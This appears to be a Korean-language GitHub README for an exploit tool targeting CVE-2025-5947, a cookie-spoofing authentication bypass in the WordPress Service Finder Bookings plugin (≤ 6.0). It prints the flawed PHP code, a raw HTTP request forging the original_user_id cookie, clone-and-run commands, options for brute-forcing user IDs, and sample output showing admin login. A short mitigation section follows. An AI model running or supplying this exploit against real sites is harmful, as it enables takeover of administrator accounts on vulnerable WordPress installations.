
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 익스플로잇
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
WordPress Service Finder Bookings ≤ 6.0 플러그인의 인증 우회 취약점을 위한 익스플로잇 도구
Service Finder Bookings WordPress 플러그인 버전 6.0 및 이전 버전에서 중요한 인증 우회 취약점이 발견되었습니다.
인증되지 않은 공격자는:
service_finder_switch_back() 함수 내 불충분한 쿠키 검증이 존재합니다:
// 안전하지 않은 코드
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// 검증 없음!
}
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
공격 특징:
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
pip install -r requirements.txt
python exploit.py -u http://target.com
# 도움말 표시
python exploit.py -h
# 관리자(ID=1)로 로그인 시도
python exploit.py -u http://target.com
# 특정 사용자 ID로 시도
python exploit.py -u http://target.com -i 5
# 무차별 대입 (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# SSL 검증 없이
python exploit.py -u http://target.com --no-ssl-verify
# 사용자 정의 타임아웃
python exploit.py -u http://target.com -t 30
python exploit.py -u http://wordpress.local
출력:
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings 플러그인 발견됨
🔍 사용자 ID 1로 로그인 시도 중...
📊 HTTP 상태: 302
📋 응답 헤더:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ 성공! 관리자로 로그인됨!
📍 리디렉션: http://wordpress.local/wp-admin/
python exploit.py -u http://target.com -b 1-20
출력:
🔄 무차별 대입 시작 (20명의 사용자)...
✅ 사용자 ID 1: 성공
❌ 사용자 ID 2: 실패
✅ 사용자 ID 3: 성공
...
✅ 성공한 사용자: [1, 3, 5]
python exploit.py -u https://target.com --no-ssl-verify
성공적인 익스플로잇은 다음 지표를 포함합니다:
✅ HTTP 301 또는 302 응답 코드
✅ Location 헤더에 /wp-admin/ 포함
✅ Set-Cookie 헤더에 wordpress_logged_in_ 포함
이 도구는 오직:
사용해야 합니다. 개발자는 책임을 지지 않습니다.
긴급 업데이트
# WordPress 관리자 패널에서 업데이트
# 또는 WP-CLI로
wp plugin update sf-booking
플러그인 비활성화
wp plugin deactivate sf-booking
플러그인 삭제
wp plugin delete sf-booking
웹 애플리케이션 방화벽 (WAF)
차단: /wp-admin/admin-ajax.php?action=service_finder_switch_back
보안 점검
버그를 신고하거나 개선 사항을 제안하려면:
git checkout -b feature/improvement)git commit -am 'Add improvement')git push origin feature/improvement)MIT License - 자세한 내용은 LICENSE 파일을 참조하세요
보안 연구원
⭐ 도움이 되셨다면 별을 눌러주세요!
| 속성 | 값 |
|---|
| CVE ID | CVE-2025-5947 |
| 플러그인 | Service Finder Bookings (sf-booking) |
| 영향받는 버전 | ≤ 6.0 |
| 심각도 | 🔴 치명적 |
| CVSS 점수 | 9.8 |
| CWE | CWE-639 (인가 우회) |
| EPSS 점수 | 0.617 (98.357 백분위) |
| 발표일 | 2025 |
| 매개변수 | 약어 | 설명 | 기본값 |
|---|
--url | -u | 대상 URL (필수) | - |
--user-id | -i | 사용자 ID | 1 |
--brute-force | -b | 무차별 대입 범위 (1-10) | - |
--no-ssl-verify | - | SSL 검증 비활성화 | False |
--timeout | -t | 요청 타임아웃 (초) | 10 |